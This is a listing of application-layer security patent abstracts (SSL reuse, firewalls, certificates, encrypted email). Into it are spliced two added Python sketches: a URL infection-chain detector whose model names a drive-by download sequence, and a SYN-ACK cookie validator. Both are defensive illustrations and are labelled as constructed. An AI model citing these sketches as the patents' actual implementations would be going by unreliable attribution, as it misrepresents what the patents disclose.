Application Layer Security Patents (Class 713/152)
  • Patent number: 8312308
    Abstract: The present invention is directed towards systems and methods for managing SSL session persistence and reuse in a multi-core system. A first core may indicate that an SSL session established by the first core is non-resumable. Responsive to the indication, the core may set an indicator at a location in memory accessible by each core of the multi-core system, the indicator indicating that the SSL session is non-resumable. A second core of the multi-core system may receive a request to reuse the SSL session. The request may include a session identifier of the SSL session. In addition, the session identifier may identify the first core as an establisher of the SSL session. The second core can identify from encoding of the session identifier whether the second core is not the establisher of the SSL session. Responsive to the identification, the second core may determine whether to resume the SSL session.
    Type: Grant
    Filed: June 22, 2009
    Date of Patent: November 13, 2012
    Assignee: Citrix Systems, Inc.
    Inventor: Tushar Kanekar
  • Patent number: 8307200
    Abstract: An authentication apparatus includes a first storage unit that stores proxy information containing a proxy ID and capability data, an acquiring unit that acquires the proxy information from the first storage unit, a first transmitting unit that transmits a second message containing the acquired proxy information to a terminal, a receiving unit that receives a third message and authentication data, the third message containing a first proxy ID and setting data from the terminal, and an authentication unit that performs an authentication process based on the authentication data, and a second transmitting unit that transmits the setting data to a server to which a proxy of the first proxy ID relays data communication.
    Type: Grant
    Filed: July 13, 2007
    Date of Patent: November 6, 2012
    Assignee: Kabushiki Kaisha Toshiba
    Inventors: Yoshimichi Tanizawa, Naoki Esaka, Tsutomu Shibata
  • Patent number: 8307421
    Abstract: End-to-end authentication capability based on public-key certificates is combined with the Session Initiation Protocol (SIP) to allow a SIP node that receives a SIP request message to authenticate the sender of the request. The SIP request message is sent with a digital signature generated with a private key of the sender and may include a certificate of the sender. The SIP request message may also be encrypted with a public key of the recipient. After receiving the SIP request, the receiving SIP node obtains a certificate of the sender and authenticates the sender based on the digital signature. The digital signature may be included in an Authorization header of the SIP request, or in a multipart message body constructed according to the S/MIME standard.
    Type: Grant
    Filed: May 17, 2007
    Date of Patent: November 6, 2012
    Assignee: Microsoft Corporation
    Inventors: Jeremy T. Buch, David J. Simons
  • Patent number: 8307415
    Abstract: Secure network communications between a source computer and a destination computer utilizing a firewall. The firewall determines a remote endpoint and the local physical memory address associated with a local endpoint included in the outbound request. The remote endpoint and the local physical memory address are hashed to generate an index value corresponding to an entry in an internal state table of the firewall. When an inbound request is received, the firewall determines a remote endpoint and the local physical memory address associated with a local endpoint included in the inbound request. The remote endpoint and the local physical memory address of the inbound request are hashed to generate an index value corresponding to an entry in the internal state table of the firewall. The firewall forwards the inbound request to the local endpoint if a matching entry is found in the internal state table at the index value.
    Type: Grant
    Filed: May 9, 2007
    Date of Patent: November 6, 2012
    Assignee: Microsoft Corporation
    Inventors: Salahuddin Christopher Jules Khan, David Abzarian
  • Patent number: 8301885
    Abstract: A method for transmitting messages via a time-controlled communication system (ZK) between a number of IP cores is provided. Each IP core has an information-processing subsystem (IVS) and a network controller (NK). Each NK has at least two interfaces, one for the ZK and one for the IVS, wherein a distinction is drawn between privileged and non-privileged messages of the ZK, and where the transmission parameters relating to the ZK of a port of the NK, such as the periodically recurring transmission time of a message and the maximum transmission duration after each transmission time, can be set by a privileged message via the ZK or directly by a privileged entity. Each NK intending to transmit a message starts to transmit the message autonomously exactly at the time of the next set transmission time and interrupts the transmission process no later than when the assigned maximum transmission duration has elapsed.
    Type: Grant
    Filed: June 30, 2006
    Date of Patent: October 30, 2012
    Assignee: FTS Computertechnik GmbH
    Inventors: Hermann Kopetz, Stefan Poledna
  • Patent number: 8296585
    Abstract: A method of encrypting/decrypting a document, a safety management storage device, and a system and method for its safety management, used for the safety management of electronic documents, the said system comprising a PC or mainframe installed with common reading software and a storage device for safety management connected to the said PC/mainframe through hot-plug; when connected to the mainframe, the said storage device is enumerated at least as a USB CDROM device. The user who owns the said storage device can encrypt electronic documents by using the encryption keys to generate an encrypted document with the same file type, can also open the encrypted document by using common reading software, and then use the document according to the predetermined operation authority.
    Type: Grant
    Filed: September 22, 2006
    Date of Patent: October 23, 2012
    Assignee: Shenzhen Netcom Electronics Co., Ltd.
    Inventors: Huabo Cai, Xuyang Zhu
  • Patent number: 8296360
    Abstract: An aggregation machine, including: a computer, an output device controlled by the computer, and networking hardware connecting the computer to a network, the computer programmed so that the aggregation apparatus: connects to a plurality of sites on the Internet; and authenticates itself with each of the plurality of sites; and retrieves information from each of the plurality of sites; and parses the information from each of the plurality of sites; and provides user-enabled content management to users, and subject to said content management, produces an aggregation of the parsed information; and renders the aggregation as output.
    Type: Grant
    Filed: April 4, 2011
    Date of Patent: October 23, 2012
    Assignee: Confluence Commons, Inc.
    Inventors: Jared Polis, Payal Goyal, Jeffery D. Herman, Samuel C. Wu, Eric Wu, Michael D. McMahon, Michael C. Wilson, Andrew Hartman, Peter K. Trzyna, David L. Calone, Chris Young, Scott Shaver, Andrew Hyde
  • Patent number: 8296559
    Abstract: A method and apparatus for sending a self-asserted certificate is described. A mail client of a sender is configured to generate a public and private key pair, to create a self-signed certificate, and to form an introduction message addressed to a recipient to enable use of the self-signed certificate prior to corresponding with the recipient. A mail client of a recipient is configured to display an indicator of a receipt of the introduction message from the sender. The indicator comprises a user interface query to the recipient to verify and accept the sender-signed certificate in response to receiving the introduction message from the sender.
    Type: Grant
    Filed: May 31, 2007
    Date of Patent: October 23, 2012
    Assignee: Red Hat, Inc.
    Inventor: Steven W. Parkinson
  • Patent number: 8291089
    Abstract: An image processing device communicable with an information processing device, includes: a first management unit for managing at least one service provided by the image processing device based on a first protocol; a second management unit for managing the at least one service provided by the image processing device based on a second protocol; a reception unit for receiving a search request for searching for a service managed by the second management unit, the search request being transmitted from the information processing device based on the first protocol; and a transmission unit for transmitting, in response to the search request received by the reception unit, an address of a service satisfying the search request and managed by the second management unit to the information processing device.
    Type: Grant
    Filed: March 10, 2009
    Date of Patent: October 16, 2012
    Assignee: Canon Kabushiki Kaisha
    Inventor: Tadahiro Nakamura
  • Patent number: 8286221
    Abstract: A device for communicating with other devices to allow them to access applications, comprises: at least a first application; authentication means for authenticating a communicating device; and access control means accessible by a communicating device requesting access to the first application without the communicating device having been authenticated by the authentication means. The device is further arranged to arbitrate whether access of the communicating device to the first application is granted or refused wherein if the arbitration requires an authentication of the communicating device, the access control means instructs the authentication means to authenticate the communicating device.
    Type: Grant
    Filed: February 7, 2006
    Date of Patent: October 9, 2012
    Assignee: Nokia Corporation
    Inventors: Thomas Muller, Martin Roter
  • Patent number: 8286157
    Abstract: Under the present invention, when an application is deployed, certain information corresponding thereto will be stored in an Enterprise Application Directory (EAD). Thereafter, when an instance of the application is requested (e.g., by a requestor), the information is retrieved from the EAD. In addition, the instance is registered with an Application Access Registry (AAR). Registering the instance involves creating a record in the AAR, generating a unique application access key for the instance, and storing the access key with the information in the record. The access key (and optionally the information) is then returned to the requestor, which can then issue service requests to one or more grid services in the shared computer infrastructure. The service request will include the access key so that the grid service can identify the application by searching for the record in the registry using the access key.
    Type: Grant
    Filed: February 28, 2005
    Date of Patent: October 9, 2012
    Assignee: International Business Machines Corporation
    Inventors: Youssef Drissi, Moon J. Kim, Lev Kozakov, Dikran S. Meliksetian, Blanche M. Waddell
  • Patent number: 8281122
    Abstract: An embodiment may include circuitry to generate, at least in part, and/or receive, at least in part, a packet. The packet may include at least one field and an encrypted payload. The at least one field may include, at least in part, a first key and/or at least one value. The first key and at least one value, as included in the at least one field, may be encrypted by a second key. The encrypted payload may be capable of being decrypted, at least in part, based, at least in part, upon the first key and/or the at least one value to yield an unencrypted payload. The unencrypted payload may include at least a portion of application layer data that is to be communicated in a secure session.
    Type: Grant
    Filed: March 2, 2009
    Date of Patent: October 2, 2012
    Assignee: Intel Corporation
    Inventors: David M. Durham, Men Long, Karanvir S. Grewal
  • Patent number: 8281409
    Abstract: Systems and methods for securely providing email messages are provided. A workstation computer is provided that includes a memory for storing computer executable instructions and a processor for accessing the memory and for executing the computer executable instructions. The computer executable instructions include an email client configured to process email messages, at least one email message having an executable decryption attachment that includes encrypted embedded content that can only be decrypted with a unique cryptography key. The executable decryption attachment, when executed, is configured to establish a secure connection with an encryption server, receive the unique cryptography key from the encryption server and decrypt the embedded content.
    Type: Grant
    Filed: December 16, 2009
    Date of Patent: October 2, 2012
    Assignee: UBS AG
    Inventor: Alex Beigelman
  • Patent number: 8270941
    Abstract: A method of processing a user interface component is provided and includes receiving one or more user interface components that can be communicated to a wireless device. A component risk level for each of the one or more user interface components is determined and assigned to each of the one or more user interface components. Each of the one or more user interface components can be digitally signed using an embedded risk code that indicates the assigned risk level. Further, the component risk level can be selected from a plurality of component risk levels. In a particular embodiment, the component risk level can be determined based on the type of the user interface component. Further, the component risk level can be determined based on a developer of the user interface component.
    Type: Grant
    Filed: February 24, 2006
    Date of Patent: September 18, 2012
    Assignee: QUALCOMM Incorporated
    Inventors: Jason B. Kenagy, Marc Edward Nijdam, Christophe Bernard
  • Patent number: 8270606
    Abstract: A system and method for real-time network communications provides a session identifier as a public key for group communication between clients, and provides a channel identifier representing a private key for each of a plurality of clients. The channel identifier includes client-specific attributes, which function to indicate grouping criteria for the group communication. A dynamic communication link is created over a network between a client and a service based upon the public and private key combination such that group communication is enabled based upon the attributes of the private key and the public key. Communications are translated using a translation service which employs the attributes associated with the private key and the public key combination to provide response information in a designated language to enable multi-lingual real-time communications.
    Type: Grant
    Filed: May 1, 2008
    Date of Patent: September 18, 2012
    Assignee: International Business Machines Corporation
    Inventors: Sasha Porto Caskey, Danning Jiang, Wen Liu, David Lubensky, Yong Qin, Andrzej Sakrajda, Cheng Wu
  • Patent number: 8272041
    Abstract: Generally speaking, systems, methods and media for implementing a firewall control system responsive to process interrogations are disclosed. Embodiments of a method may include receiving a data request at a firewall where the data request is associated with a program and determining whether a process rule exists for the associated program, where the process rule includes a condition to be satisfied for a process of the user computer system. Embodiments may also include, in response to determining that a process rule does exist, determining a method for evaluating a status of the process and determining a current status of the process. Embodiments may also include determining whether the process rule is satisfied based on the current status of the process and using the determined evaluation method. Embodiments may also include, in response to determining whether the condition of the process rule is satisfied, performing one or more firewall actions.
    Type: Grant
    Filed: June 21, 2007
    Date of Patent: September 18, 2012
    Assignee: International Business Machines Corporation
    Inventors: Rick A. Hamilton, II, Brian M. O'Connell, John R. Pavesi, Keith R. Walker
  • Patent number: 8272043
    Abstract: Generally speaking, systems, methods and media for implementing a firewall control system responsive to user authentications are disclosed. Embodiments of a method may include receiving a data request at a firewall where the data request is associated with a program. Embodiments may include determining whether an authentication plan is required to be matched for the associated program and, if so, accessing a stored authentication plan associated with the program and having one or more authentication records each having expected information relating to user access to a particular server. Embodiments may include accessing a current authentication plan from an authentication store, the current authentication plan having one or more authentication records each having information relating to user access to a particular server.
    Type: Grant
    Filed: June 21, 2007
    Date of Patent: September 18, 2012
    Assignee: International Business Machines Corporation
    Inventors: Rick A. Hamilton, II, Brian M. O'Connell, John R. Pavesi, Keith R. Walker
  • Patent number: 8266423
    Abstract: A method for securing a program against attacks by error, i.e. in a chip card, wherein at least one jump instruction, including a relative address chosen from a plurality of possible relative addresses, is identified in the program, wherein the at least one jump instruction makes it possible to reach a targeted address inside the memory area extending before and after the jump instruction and regrouping the plurality of possible relative addresses, inside the memory area, wherein an instruction to be preserved is identified and, in order to secure at least the instruction, at least one first non-operative batch including at least one instruction is inserted, the insertion being carried out in such a way as to ensure that the insertion is compatible with maintenance of the address targeted by the jump instruction inside the memory area and that the insertion is compatible with the normal running of the program.
    Type: Grant
    Filed: October 18, 2005
    Date of Patent: September 11, 2012
    Assignee: Oberthur Technologies
    Inventors: Christophe Giraud, Hugues Thiebeauld De La Crouee
  • Patent number: 8261353
    Abstract: An automatic patch deployment system is provided that deploys a patch according to an assessed risk and a policy. The policy may specify actions to be taken to deploy the patch for different categories of risk. The automatic patch deployment system receives a patch notification, an assessment of the risk, and the policy and deploys the patch accordingly. For example, installation of a patch may be indefinitely delayed for high risk patches, rescheduled for medium risk patches, or installed immediately for low risk patches.
    Type: Grant
    Filed: June 2, 2008
    Date of Patent: September 4, 2012
    Assignee: International Business Machines Corporation
    Inventors: Praveen Prasanna Kumar Hirsave, Puthukode G. Ramachandran, Edmund Troche, Minto Tsai
  • Patent number: 8260673
    Abstract: Parties involved in a transaction in an E-marketplace identify characteristics of a transaction that they are willing to accept and/or that they can provide. To do this, an attribute certificate is created for each party that contains the attributes of a buyer, seller, or third-party participant who will be transacting business in the particular E-marketplace. The attributes pertain to specifics of the transaction. The party submitting the attribute also identifies alternative conditions which, if they exist would be acceptable for conducting the transaction. Once these criteria, in the form of the attribute certificates, are received by the E-marketplace, the E-marketplace verifies the attributes. A server in the E-marketplace is configured to determine various combinations of participants that can match the deal criteria. In this manner, the E-marketplace “choreographs” the transaction to meet the needs of all.
    Type: Grant
    Filed: May 9, 2003
    Date of Patent: September 4, 2012
    Assignee: International Business Machines Corporation
    Inventors: Gordon K. Arnold, David G. Kuehr-McLaren
  • Patent number: 8261055
    Abstract: A first information processing apparatus encrypts data that it receives from a second information processing apparatus, and transmits the data thus encrypted to an external device. The second information processing apparatus transmits the data to the first information processing apparatus according to a data size that results after a data size being necessary for communication of the encrypted data is subtracted from a specified data size.
    Type: Grant
    Filed: June 27, 2007
    Date of Patent: September 4, 2012
    Assignee: Canon Kabushiki Kaisha
    Inventor: Masahiko Sakai
  • Patent number: 8255465
    Abstract: Methods and systems for communicating information between computer networks in which the information to be communicated is required at one location (e.g. for processing) but only available at another location. The information may be absent deliberately (for privacy reasons) or may simply be unavailable as an artifact of the computer network(s) involved. The required information, such as the internal client IP address, is inserted into the outgoing network communication in a manner that does not materially affect the normal transit or utility of the network communication (e.g. as custom headers). The information is preferably inserted in an encrypted form, so that it may pass over a public network and be invulnerable to unauthorised scrutiny.
    Type: Grant
    Filed: September 22, 2006
    Date of Patent: August 28, 2012
    Assignee: ScanSafe Limited
    Inventor: John Edwards
  • Patent number: 8255680
    Abstract: A method and apparatus for providing layer-independent secure network communication is provided. According to an embodiment of the invention, a transmission medium is provided between a first network node and a second network node. Both the first network node and the second network node support at least one common communication protocol. A Java output stream is established between a first process executing on the first network node and the transmission medium. Also, a Java input stream is established between a second process executing on the second multi-layered node and the transmission medium. Data to be transmitted from the first process to the second process is encrypted by the first process and written to the Java output stream. The data is transmitted to the second network node. Then the data is read from the Java input stream by the second process and decrypted.
    Type: Grant
    Filed: June 26, 1997
    Date of Patent: August 28, 2012
    Assignee: Oracle America, Inc.
    Inventor: Li Gong
  • Patent number: 8255985
    Abstract: Recommending a security policy to a firewall, includes receiving a request from a firewall for a recommendation as to whether the firewall should allow or block a detected present communication for which the firewall does not have an existing security policy. Information about past blocked and allowed communications at other firewalls on a network is searched to identify past communications that are similar to the present communication. The identified past communications are assigned a respective positive or negative vote. A positive vote indicates a past communication was allowed and a negative vote indicates a past communication was not allowed. A positive recommendation is sent to the requesting firewall to allow the present communication if the positive votes outnumber the negative votes, and a negative recommendation is sent to the requesting firewall to block the present communication if the negative votes outnumber the positive votes.
    Type: Grant
    Filed: November 13, 2006
    Date of Patent: August 28, 2012
    Assignee: AT&T Intellectual Property I, L.P.
    Inventor: Jeffrey Aaron
  • Patent number: 8250659
    Abstract: By arranging a redundancy means and a control means upstream from an encryption means which encrypts and decrypts the data to be stored in an external memory, the integrity of data may be ensured when the generation of redundancy information is realized by the redundancy means, and when the generation of a syndrome bit vector indicating any alteration of the data is implemented by the control means. What is preferred is a control matrix constructed from idempotent, thinly populated, circulant square sub-matrices only. By arranging redundancy and control means upstream from the encryption/decryption means, what is achieved is that both errors in the encrypted data and errors of the non-encrypted data may be proven, provided that they have occurred in the data path between the redundancy/control means and the encryption/decryption means.
    Type: Grant
    Filed: June 19, 2006
    Date of Patent: August 21, 2012
    Assignee: Infineon Technologies AG
    Inventors: Berndt Gammel, Rainer Goettfert
  • Patent number: 8239931
    Abstract: A communication apparatus used in a plurality of networks is disclosed. The communication apparatus includes a firewall which allows communication with outside of the communication apparatus when disabled, and prohibits communication with outside of the communication apparatus when enabled. Then, the communication apparatus includes a firewall control unit which acquires a first MAC address of a first default gateway provided for a predetermined specific network and a second MAC address of a second default gateway provided for a network in which the communication apparatus is being connected, and controls the firewall according to a result of comparison of the first MAC address and the second MAC address.
    Type: Grant
    Filed: January 29, 2009
    Date of Patent: August 7, 2012
    Assignees: NEC Corporation, NEC Access Technica, Ltd.
    Inventors: Mamiko Hayasaka, Yoshinori Unno, Masanobu Kawashima
  • Patent number: 8234708
    Abstract: It is an object of the present invention to provide an information processing device and a memory management method that enable execution of memory management processing for simultaneously starting up two types of applications. During execution of an application in the form of a Java application, the application starts up another application in the form of Flash data, and then native software in the form of a Flash Player causes a memory management unit to secure a prescribed memory area from a memory area for the native software. The native software then starts up the other application using the secured memory area.
    Type: Grant
    Filed: October 21, 2009
    Date of Patent: July 31, 2012
    Assignee: NTT DoCoMo, Inc.
    Inventors: Akiko Tobe, Masayuki Tsuda
  • Patent number: 8230214
    Abstract: A method for enabling efficient SSL handshakes through precomputing of handshake messages, the method includes: receiving, by an appliance, a server certificate identifying a server; generating, by the appliance, at least one of: (i) an SSL server certificate message comprising the received server certificate, (ii) an SSL client certificate request message, and (iii) an SSL hello done message; storing, by the appliance, the generated messages; receiving, by the appliance from a client, an SSL client hello message identifying the server; and transmitting, by the appliance to the client, an SSL server hello message and at least one of the stored messages. Corresponding systems are also described.
    Type: Grant
    Filed: August 21, 2006
    Date of Patent: July 24, 2012
    Assignee: Citrix Systems, Inc.
    Inventors: Tushar Kanekar, Sivaprasad Udupa
  • Patent number: 8224738
    Abstract: Methods, software, and hardware are disclosed for providing verified real time price quotes in an over-the-counter financial market. Systems are described that can comprise methods, software, and/or hardware to provide verified real time price information for securities traded over-the-counter. Verification methods of the invention include identifying suspect source data, wherein the suspect source data includes information about the price of a security, verifying the suspect source data, and displaying to a user a verified price quote of a security traded in an over-the-counter market to a user. The verification methods of the invention include using hash functions and hash tables to process suspect source data, wherein the hashing allows for confidential processing while at the same time maintaining the ability to match a price quote to the source of the price quote.
    Type: Grant
    Filed: August 31, 2005
    Date of Patent: July 17, 2012
    Assignee: Credit Market Analysis, Ltd.
    Inventors: Stephen Richard Madle, Forbes Herbert Elworthy
  • Patent number: 8223354
    Abstract: A printing apparatus capable of maintaining confidentiality of a printed matter more reliably. Where a confidential print command is received, when user identification information for a user who issued the confidential print command is read from a recording medium such as an IC card by a reader, the printing apparatus puts the execution of the print processing pertaining to the confidential print command on hold if print processing based on a command issued by a user other than the user who issued the confidential print command via operation of an operation unit is being executed, and it begins the execution of the print processing pertaining to the confidential print command if print processing based on a command issued by a user other than the user who issued said confidential print command via operation of the operation unit is not being executed.
    Type: Grant
    Filed: May 19, 2006
    Date of Patent: July 17, 2012
    Assignee: Konica Minolta Business Technologies, Inc.
    Inventor: Kazuhiro Itagaki
  • Patent number: 8219798
    Abstract: A method for frustrating unauthorized access to an electronic mail message having address, body and attachment information and being transmitted from a first computer to a second computer, including: at the first computer: detecting a request to send the message; encrypting the extracted body information; replacing the extracted body information with the encrypted body information; extracting the attachment information; encrypting the extracted attachment information; replacing the extracted attachment information with the encrypted attachment information; returning the message having the encrypted body and attachment information to the mail user application; and transmitting the message having the encrypted body and attachment information to a third computer; and, at the third computer: decrypting and re-encrypting the transmitted body information; decrypting and re-encrypting the transmitted attachment information; and, transmitting the re-encrypted body and attachment information to the second computer.
    Type: Grant
    Filed: December 16, 2010
    Date of Patent: July 10, 2012
    Assignee: Copytele, Inc.
    Inventors: Frank J. DiSanto, Denis A. Krusos, Edward Lewit
  • Patent number: 8219799
    Abstract: A secure communication system that includes a communication processor, an internet protocol converter that converts data to and from its original protocol to internet protocol, an encryptor/decryptor to provide additional security for communications that are routed through the secure communication system, and a cryptography module and other logic that identifies the security classification of data and verifies the cryptographic keys of the source, in the communication, and of the destination. An additional security processor may be provided as required by secure communication standards. The secure communication system may also include an internet router that routes the data through the secure communication system. The communication processor provides real-time control and can change a source or destination, an encryption key, a security level, or the protocol of a communication in response to sensor data received from a communicating entity or from command signals from a connected or remote control system.
    Type: Grant
    Filed: April 25, 2008
    Date of Patent: July 10, 2012
    Assignee: Lockheed Martin Corporation
    Inventors: Frank A. Lucchesi, Christopher T. Wolff, Jeffrey J. Byrnes
  • Patent number: 8214884
    Abstract: A management server acts as a repository for a plurality of user certificates corresponding to a plurality of users. When a user wishes to access a remote computer such as a secure-enabled host requiring a secure credential, his/her computer sends a request message to the management server. The management server may perform its own validity checking. In response to a request and conditioned on the management server authorizing access to a computing resource that requires an authorization credential, the management server delivers the requested credential and executable code, the authorization credential comprising information that enables access to the computing resource and the delivered executable code manages the lifecycle of the delivered authorization credential by allowing only temporary storage without caching of the delivered authorization credential.
    Type: Grant
    Filed: June 25, 2004
    Date of Patent: July 3, 2012
    Assignee: Attachmate Corporation
    Inventors: Sharon Xia, Eduardo Muñoz, Dan Brombaugh
  • Patent number: 8214634
    Abstract: Validating a certificate is disclosed. Whether the certificate was previously determined to be valid by one or more peer entities is determined. The certificate is validated based at least in part on the determination.
    Type: Grant
    Filed: February 21, 2006
    Date of Patent: July 3, 2012
    Assignee: Adobe Systems Incorporated
    Inventors: Joseph Steele, Sunil Agrawal
  • Patent number: 8209532
    Abstract: A system and method for implementing security of multi-party communication is disclosed. The system mainly includes a group key management unit and a record protocol unit. The method mainly includes: when the system runs in the centralized group key management mode, the Group Controller and Key Server (GCKS) establishes and stores a Group Security Association, the GCKS negotiates with the group members to establish an Initiation Security Association, and, under the protection of the Initiation Security Association, the group members obtain the Group Security Association from the GCKS. When the system runs in the distributed group key management mode, a Group Security Association is established by all the group members together at the beginning of the group communication.
    Type: Grant
    Filed: January 9, 2009
    Date of Patent: June 26, 2012
    Assignee: Huawei Technologies Co., Ltd
    Inventors: Ya Liu, Fuyou Miao
  • Patent number: 8205258
    Abstract: Uniform resource locator (URL) patterns are found in browsing histories of client computers. The URL patterns are employed to find URL browsing chains for particular client computers. A URL browsing chain includes URL requests that match URL patterns arranged in sequential order by time stamp. The URL browsing chains may be normalized and then evaluated for web threat infection chains. URL browsing chains that are deemed to be web threat infection chains are built into a model. The model may be deployed locally in a client computer or in a remotely located server computer to detect web threat infection chains.
    Type: Grant
    Filed: November 30, 2009
    Date of Patent: June 19, 2012
    Assignee: Trend Micro Incorporated
    Inventors: Ming-Tai Chang, Casper Wang, Peng-Shih Pu
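The chain-building and matching steps described in the abstract above, as an added Python illustration that is not code from the patent or from Trend Micro. The browsing-history line format, the URL normalisation rules (digit runs collapsed, query string dropped), the ten-second chain window and the single model chain are all constructed for this example.

```python
"""URL browsing-chain extraction and infection-chain matching, modelled on the
abstract of US 8205258 (Trend Micro). Added example; log format, normalisation
rules and model chains are constructed here, not taken from the patent."""
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed browsing history: "<epoch seconds> <client id> <url>"
HISTORY = """\
1000 clientA http://news.example/article?id=42
1003 clientA http://ads.example/serve/8812.js
1004 clientA http://cdn.example/lib/jquery.js
1005 clientA http://x1.example/gate.php?a=9
1008 clientA http://drop.example/files/0011/payload.exe
2000 clientB http://news.example/article?id=7
2002 clientB http://cdn.example/lib/jquery.js
2010 clientB http://mail.example/inbox
"""

# Constructed model: ordered URL-pattern sequences deemed infection chains.
INFECTION_MODEL = [
    ["ads.example/serve/N.js", "x1.example/gate.php", "drop.example/files/N/payload.exe"],
]


def normalize(url: str) -> str:
    """Reduce a URL to a pattern: host plus path with digit runs replaced by
    'N' and the query string dropped, so per-victim identifiers do not defeat
    matching."""
    p = urlparse(url)
    path = re.sub(r"\d+", "N", p.path)
    return f"{p.hostname}{path}"


def browsing_chains(history: str, window: int = 10) -> dict[str, list[list[str]]]:
    """Per client, order requests by time stamp and cut them into chains where
    consecutive requests are at most `window` seconds apart."""
    per_client: dict[str, list[tuple[int, str]]] = defaultdict(list)
    for line in history.strip().splitlines():
        ts, client, url = line.split(maxsplit=2)
        per_client[client].append((int(ts), normalize(url)))
    chains: dict[str, list[list[str]]] = {}
    for client, reqs in per_client.items():
        reqs.sort()
        chains[client] = []
        current: list[str] = []
        last = None
        for ts, pattern in reqs:
            if last is not None and ts - last > window:
                chains[client].append(current)
                current = []
            current.append(pattern)
            last = ts
        if current:
            chains[client].append(current)
    return chains


def contains_subsequence(chain: list[str], model: list[str]) -> bool:
    """True if every model step appears in the chain in order; unrelated
    requests (CDN scripts, ads) may be interleaved between the steps."""
    it = iter(chain)
    return all(step in it for step in model)


def detect(history: str) -> dict[str, list[str]]:
    """For each client, the model chains that its browsing chains contain."""
    hits: dict[str, list[str]] = {}
    for client, chains in browsing_chains(history).items():
        hits[client] = [
            " > ".join(model)
            for model in INFECTION_MODEL
            if any(contains_subsequence(chain, model) for chain in chains)
        ]
    return hits
```

Running `detect(HISTORY)` flags clientA, whose visit to the news site was followed within seconds by the ad script, the gate page and the executable download, while clientB, who loaded the same news article and the same CDN library, is not flagged. The subsequence match is what lets the model tolerate the benign requests that sit between the malicious steps in a real history.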
  • Patent number: 8205257
    Abstract: A computer-implemented method for preventing threats originating from a non-process based component hosted by a trusted process is described. The loading activity of the trusted process is monitored. A trust level associated with the trusted process is altered when an unverified component is loaded into the trusted process. Events performed by the trusted process are monitored. An unverified component that originated the event is identified. The trusted process is terminated based on a security risk associated with the unverified component that originated the event.
    Type: Grant
    Filed: July 28, 2009
    Date of Patent: June 19, 2012
    Assignee: Symantec Corporation
    Inventors: Sourabh Satish, Shane Pereira, Uri Mann
  • Patent number: 8200957
    Abstract: A method, apparatus, and system are directed toward managing a Transmission Control Protocol/Internet Protocol (TCP/IP) handshake. A SYN-ACK cookie is determined based on a cryptographic operation using a secret key and at least one network characteristic. The SYN-ACK cookie is provided in a SYN message's field. The SYN message is sent from a client to a server. Another sequence number based on the received SYN-ACK cookie is included in a SYN-ACK message. The SYN-ACK message is sent to and received by the client. The other sequence number is validated based on the secret key to generate at least another network characteristic. A TCP/IP connection is established if the network characteristic matches the other network characteristic. In one embodiment, the component sending the SYN message may be a different component than the component receiving the SYN-ACK message. In this embodiment, the secret key may be shared between the two components.
    Type: Grant
    Filed: March 4, 2011
    Date of Patent: June 12, 2012
    Assignee: F5 Networks, Inc.
    Inventors: Arindum Mukerji, Jesse Abraham Rothstein
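The exchange the abstract describes, with the client's cookie bound into the SYN, echoed in the server's sequence number and checked statelessly by the receiving component, as an added Python illustration. This is not code from the patent or from F5: the 32-bit layout (24 HMAC bits plus an 8-bit counter), HMAC-SHA256 as the cryptographic operation and the connection 4-tuple as the "network characteristic" are assumptions made for the example.

```python
"""Client-side SYN-ACK cookie, modelled on the abstract of US 8200957 (F5).

Added illustration only; not code from the patent or from F5. The 32-bit
layout (24 HMAC bits + 8 counter bits), HMAC-SHA256 as the cryptographic
operation and the connection 4-tuple as the "network characteristic" are
assumptions made for this example.
"""
from __future__ import annotations

import hashlib
import hmac
from dataclasses import dataclass


@dataclass(frozen=True)
class FlowTuple:
    """Network characteristic bound into the cookie: the client's view of the flow."""
    client_ip: str
    client_port: int
    server_ip: str
    server_port: int

    def encode(self) -> bytes:
        return f"{self.client_ip}:{self.client_port}>{self.server_ip}:{self.server_port}".encode()


def make_cookie(secret: bytes, flow: FlowTuple) -> int:
    """24-bit cookie: truncated HMAC-SHA256 of the 4-tuple under the shared secret."""
    mac = hmac.new(secret, flow.encode(), hashlib.sha256).digest()
    return int.from_bytes(mac[:3], "big")


def client_syn(secret: bytes, flow: FlowTuple, counter: int) -> int:
    """Client ISN carried in the SYN: cookie in the high 24 bits, an 8-bit
    counter (so repeated connections do not reuse an ISN) in the low 8 bits."""
    return (make_cookie(secret, flow) << 8) | (counter & 0xFF)


def server_syn_ack(syn_isn: int, server_counter: int) -> tuple[int, int]:
    """Server side: echo the cookie bits into its own sequence number and
    acknowledge the client's ISN. The server does not need the secret."""
    cookie = syn_isn >> 8
    seq = (cookie << 8) | (server_counter & 0xFF)
    ack = (syn_isn + 1) & 0xFFFFFFFF
    return seq, ack


def flow_from_syn_ack(src_ip: str, src_port: int, dst_ip: str, dst_port: int) -> FlowTuple:
    """The SYN-ACK travels server -> client, so swap ends to recover the client's view."""
    return FlowTuple(dst_ip, dst_port, src_ip, src_port)


def client_validate(secret: bytes, flow_seen: FlowTuple, syn_ack_seq: int) -> bool:
    """Receiving component (possibly a different component from the SYN sender,
    sharing only the secret): recompute the cookie from the 4-tuple observed on
    the SYN-ACK and compare it, in constant time, with the echoed cookie bits.
    No per-flow state is kept, so forged or misdirected SYN-ACKs are rejected
    without a table lookup."""
    expected = make_cookie(secret, flow_seen).to_bytes(3, "big")
    echoed = (syn_ack_seq >> 8).to_bytes(3, "big")
    return hmac.compare_digest(expected, echoed)


SECRET = b"shared-between-sender-and-receiver"          # constructed
FLOW = FlowTuple("10.0.0.5", 51000, "192.0.2.10", 443)  # constructed


def demo_valid() -> bool:
    """Honest server: SYN-ACK validates."""
    syn_isn = client_syn(SECRET, FLOW, counter=1)
    seq, ack = server_syn_ack(syn_isn, server_counter=9)
    assert ack == (syn_isn + 1) & 0xFFFFFFFF
    seen = flow_from_syn_ack("192.0.2.10", 443, "10.0.0.5", 51000)
    return client_validate(SECRET, seen, seq)


def demo_flipped_cookie_bit() -> bool:
    """Without the secret an attacker must guess all 24 cookie bits; one wrong bit fails."""
    syn_isn = client_syn(SECRET, FLOW, counter=1)
    seq, _ = server_syn_ack(syn_isn, server_counter=9)
    return client_validate(SECRET, FLOW, seq ^ (1 << 8))


def demo_wrong_source() -> bool:
    """A SYN-ACK arriving from a different server address fails the 4-tuple binding."""
    syn_isn = client_syn(SECRET, FLOW, counter=1)
    seq, _ = server_syn_ack(syn_isn, server_counter=9)
    seen = flow_from_syn_ack("198.51.100.7", 443, "10.0.0.5", 51000)
    return client_validate(SECRET, seen, seq)
```

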